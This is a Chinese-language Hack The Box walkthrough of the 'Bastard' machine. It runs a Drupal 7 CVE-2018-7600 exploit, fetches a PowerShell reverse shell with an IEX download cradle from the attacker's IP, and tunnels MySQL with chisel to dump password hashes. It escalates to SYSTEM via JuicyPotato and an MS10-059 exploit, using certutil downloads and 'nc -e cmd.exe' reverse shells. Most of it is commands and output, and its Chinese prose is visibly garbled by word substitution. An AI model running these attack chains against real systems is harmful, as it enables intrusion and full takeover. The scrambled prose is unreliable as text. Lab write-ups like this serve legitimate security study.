乐趣区

关于渗透测试:HTBBastard缺失补丁枚举用户权限SeImpersonatePrivilegeJuicyPotato

免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责

服务探测

root💀kali)-[~/htb/Bastard]
└─# nmap -sV -Pn -A -O 10.10.10.9 -p-                                                      
Starting Nmap 7.92 (https://nmap.org) at 2022-01-09 22:49 EST
Nmap scan report for 10.10.10.9
Host is up (0.31s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
80/tcp    open  tcpwrapped
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc?
49154/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (89%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (89%), Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 (88%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Server 2008 R2 or Windows 8.1 (88%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (88%), Microsoft Windows 7 (88%), Microsoft Windows 7 Professional or Windows 8 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   310.73 ms 10.10.14.1
2   ...
3   309.08 ms 10.10.10.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2442.65 seconds

web

目录爆破

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 40 -u http://10.10.10.9 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_|)

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 40
Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.9/_22-01-09_22-42-15.txt

Error Log: /root/dirsearch/logs/errors-22-01-09_22-42-15.log

Target: http://10.10.10.9/

[22:42:22] Starting: 
[22:47:51] 200 -  108KB - /CHANGELOG.txt
[22:47:52] 200 -    1KB - /COPYRIGHT.txt
[22:47:55] 200 -  108KB - /CHANGELOG.TXT
[22:48:02] 200 -  108KB - /ChangeLog.txt
[22:48:02] 200 -  108KB - /Changelog.txt
[22:49:06] 200 -   18KB - /INSTALL.TXT
[22:49:06] 200 -    2KB - /INSTALL.mysql.txt
[22:49:07] 200 -    2KB - /INSTALL.pgsql.txt
[22:49:08] 200 -   18KB - /INSTALL.txt
[22:49:09] 200 -   18KB - /Install.txt
[22:49:15] 200 -    9KB - /MAINTAINERS.txt
[22:49:18] 200 -   18KB - /LICENSE.txt
[22:49:57] 200 -    5KB - /README.TXT
[22:49:58] 200 -    5KB - /README.txt
[22:50:01] 200 -    5KB - /ReadMe.txt
[22:50:01] 200 -    5KB - /Readme.txt
[22:51:20] 200 -   10KB - /UPGRADE.txt
[23:27:59] 200 -  108KB - /changelog.txt
[23:45:19] 301 -  150B  - /includes  ->  http://10.10.10.9/includes/
[23:51:45] 200 -    9KB - /maintainers.txt
[23:53:37] 403 -    1KB - /members.sql
[23:53:58] 301 -  146B  - /misc  ->  http://10.10.10.9/misc/
[23:55:02] 301 -  149B  - /modules  ->  http://10.10.10.9/modules/
[00:05:25] 301 -  150B  - /profiles  ->  http://10.10.10.9/profiles/
[00:05:26] 403 -    1KB - /profiles/standard/standard.info
[00:08:06] 200 -    2KB - /robots.txt
[00:08:46] 301 -  149B  - /scripts  ->  http://10.10.10.9/scripts/
[00:12:28] 301 -  147B  - /sites  ->  http://10.10.10.9/sites/
[00:12:30] 200 -  151B  - /sites/all/libraries/README.txt
[00:12:32] 200 - 1020B  - /sites/all/themes/README.txt
[00:12:34] 200 -    1KB - /sites/all/modules/README.txt
[00:12:35] 200 -  904B  - /sites/README.txt
[00:16:25] 301 -  146B  - /temp  ->  http://10.10.10.9/temp/
[00:17:29] 301 -  148B  - /themes  ->  http://10.10.10.9/themes/
[00:19:13] 200 -   10KB - /upgrade.txt
                                                                               
Task Completed        

80 端口 web 服务关上是一个 Drupal 站点,在 changlog.txt 里暴露出了版本号为 7.54

kali 搜寻这个版本的破绽状况显示存在 RCE

┌──(root💀kali)-[~/htb/Bastard]
└─# searchsploit Drupal 7.54             
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                                                                  | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                                                               | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                                                                       | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                                                                   | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                                                                          | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                                                                     | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                                                                            | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                                                                        | php/webapps/46459.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

在 github 上找到了这个 exp

执行,证实存在 RCE

┌──(root💀kali)-[~/htb/Bastard]
└─# python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c whoami 

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-4PCW5lyRN9tSvkhtTWc7UK49hDuhBYp1x6H0_7n2a1A
[*] Triggering exploit to execute: whoami
nt authority\iusr

foodhold

筹备好一个 Invoke-PowerShellTcp.ps1 脚本

开启一个 http 服务

┌──(root💀kali)-[~]
└─# python3 -m http.server                              
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

开启监听

nc -lnvp 4242

应用上面 payload 拿到 foodhold

┌──(root💀kali)-[~/htb/Bastard]
└─# python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/Invoke-PowerShellTcp.ps1')"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-OVxJXEVi1HyRD_ceKtMc4ArV7CnwvkPS4Fakar_Z8nY
[*] Triggering exploit to execute: powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3:8000/Invoke-PowerShellTcp.ps1')

收到反弹 shell

┌──(root💀kali)-[~/htb/Bastard]
└─# nc -lnvp 4242                                                                                             1 ⨯
listening on [any] 4242 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58568
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr
PS C:\inetpub\drupal-7.54> 

在用户 dimitris 的桌面拿到 user.txt

提权

mysql

在 C:\inetpub\drupal-7.54\sites\default\settings.php 找到数据库明码

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'root',
      'password' => 'mysql123!root',
      'host' => 'localhost',
      'port' => '','driver'=>'mysql','prefix'=>'',
    ),
  ),
);

查看网络连接,发现对内开启了 mysql

PS C:\inetpub\drupal-7.54>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:81             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1060
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       368
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       760
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       804
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       492
  TCP    10.10.10.9:80          10.10.16.3:39654       ESTABLISHED     4
  TCP    10.10.10.9:139         0.0.0.0:0              LISTENING       4
  TCP    10.10.10.9:58568       10.10.16.3:4242        CLOSE_WAIT      2860
  TCP    10.10.10.9:58577       10.10.16.3:4242        CLOSE_WAIT      1752
  TCP    10.10.10.9:58583       10.10.16.3:4242        CLOSE_WAIT      2804
  TCP    10.10.10.9:58605       10.10.16.3:4242        ESTABLISHED     2288
  TCP    127.0.0.1:3306         127.0.0.1:58566        ESTABLISHED     1060
  TCP    127.0.0.1:3306         127.0.0.1:58575        ESTABLISHED     1060
  TCP    127.0.0.1:3306         127.0.0.1:58581        ESTABLISHED     1060
  TCP    127.0.0.1:3306         127.0.0.1:58602        ESTABLISHED     1060
  TCP    127.0.0.1:58566        127.0.0.1:3306         ESTABLISHED     2628
  TCP    127.0.0.1:58575        127.0.0.1:3306         ESTABLISHED     2960
  TCP    127.0.0.1:58581        127.0.0.1:3306         ESTABLISHED     2984
  TCP    127.0.0.1:58600        127.0.0.1:3306         TIME_WAIT       0
  TCP    127.0.0.1:58602        127.0.0.1:3306         ESTABLISHED     2856
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:81                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       672
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       368
  TCP    [::]:49153             [::]:0                 LISTENING       760
  TCP    [::]:49154             [::]:0                 LISTENING       804
  TCP    [::]:49155             [::]:0                 LISTENING       476
  TCP    [::]:49156             [::]:0                 LISTENING       492
  UDP    0.0.0.0:123            *:*                                    848
  UDP    0.0.0.0:5355           *:*                                    932
  UDP    10.10.10.9:137         *:*                                    4
  UDP    10.10.10.9:138         *:*                                    4
  UDP    [::]:123               *:*                                    848

外网无法访问到靶机的 mysql 服务,传 chisel 到靶机,转发 mysql 服务端口

kali 端执行

 ./chisel server -p 8000 --reverse

靶机执行

 .\chisel.exe client 10.10.16.3:8000 R:3306:localhost:3306

kali 端连贯 mysql 服务

┌──(root💀kali)-[~/htb/Bastard]
└─# mysql -h 127.0.0.1 -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 29269
Server version: 5.5.45 MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databses;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'databses' at line 1
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupal             |
| mysql              |
| performance_schema |
| test               |
+--------------------+
5 rows in set (0.808 sec)

在 users 表找到一个账号密码,另外一个是咱们测试注册写入的账号

 MySQL [drupal]> select * from users;
+-----+-------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------+----------+---------+----------------------+------+
| uid | name  | pass                                                    | mail                 | theme | signature | signature_format | created    | access     | login      | status | timezone      | language | picture | init                 | data |
+-----+-------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------+----------+---------+----------------------+------+
|   0 |       |                                                         |                      |       |           | NULL             |          0 |          0 |          0 |      0 | NULL          |          |       0 |                      | NULL |
|   1 | admin | $S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE | drupal@hackthebox.gr |       |           | NULL             | 1489920428 | 1492102672 | 1492102672 |      1 | Europe/Athens |          |       0 | drupal@hackthebox.gr | b:0; |
|   5 | max   | $S$DnGAoPgTNp7LuoqwmIQjs0m2itKf9bhb/lDoGLHTUjdHjXm..SqN | 1@1.com              |       |           | filtered_html    | 1641782294 |          0 |          0 |      0 | Europe/Athens |          |       0 | 1@1.com              | NULL |
+-----+-------+---------------------------------------------------------+----------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------+----------+---------+----------------------+------+
3 rows in set (0.792 sec)

然而 rockyou 跑了良久没有方法破解这个 hash

提权办法一:烂土豆

查看本账号权限

PS C:\users\dimitris\desktop> whoami /all

USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

注意开启了 SeImpersonatePrivilege 权限,意味着能够应用烂土豆提权。从 github 下载烂土豆

下载烂土豆到靶机

certutil -urlcache -split -f http://10.10.16.3:8000/JuicyPotato.exe

下载 nc.exe 到靶机

certutil -urlcache -split -f http://10.10.16.3:8000/nc.exe

这里会有点绕,我在 powershell 下无奈胜利执行 JuicyPotato.exe,会报这个谬误

PS C:\inetpub\drupal-7.54\temp> .\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4444" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
PS C:\inetpub\drupal-7.54\temp> Invoke-PowerShellTcp : Bad numeric constant: 9.
At line:117 char:21
+ Invoke-PowerShellTcp <<<<  -Reverse -IPAddress 10.10.16.3 -Port 4242
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep 
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio 
   n,Invoke-PowerShellTcp

须要反弹一个 cmd 的 shell 回 kali

靶机

.\nc.exe 10.10.16.3 4444 -e cmd.exe

kali

┌──(root💀kali)-[~/htb/Bastard]
└─# nc -lnvp 4444                    
listening on [any] 4444 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58695
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\inetpub\drupal-7.54\temp>whoami
whoami
nt authority\iusr

在新的 cmd shell 下执行上面命令:

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a “/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4455” -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

胜利执行

C:\inetpub\drupal-7.54\temp>JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4455" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\inetpub\drupal-7.54\TEMP\nc.exe -e cmd.exe 10.10.16.3 4455" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
....
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

收到反弹 shell

┌──(root💀kali)-[~/htb/Bastard]
└─# nc -lnvp 4455                                                                                       1 ⨯
listening on [any] 4455 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58688
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

提权办法二:缺失补丁:

systeminfo 命令打印零碎信息

PS C:\inetpub\drupal-7.54\temp> systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ??
System Boot Time:          10/1/2022, 4:08:39 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.549 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.587 MB
Virtual Memory: In Use:    508 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

把下面信息保留到 kali 端 system.info 文件

更新 Windows-Exploit-Suggester 数据库

┌──(root💀kali)-[~/Windows-Exploit-Suggester]
└─# python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2022-01-10-mssb.xls
[*] done

枚举靶机缺失补丁

┌──(root💀kali)-[~/Windows-Exploit-Suggester]
└─# python windows-exploit-suggester.py --database 2022-01-10-mssb.xls  --systeminfo /root/htb/Bastard/system.info 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

下面补丁一个个枚举当前,锁定MS10-059

下载 github 上这个提权 exp

下载到靶机

certutil -urlcache -split -f http://10.10.16.3:8000/MS10-059.exe

执行反弹 shell

PS C:\inetpub\drupal-7.54\temp> .\MS10-059.exe 10.10.16.3 4444

收到反弹 shell

┌──(root💀kali)-[~/htb/Bastard]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.9] 58664
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54\temp>whoami
whoami
nt authority\system

曾经是 system 权限

退出移动版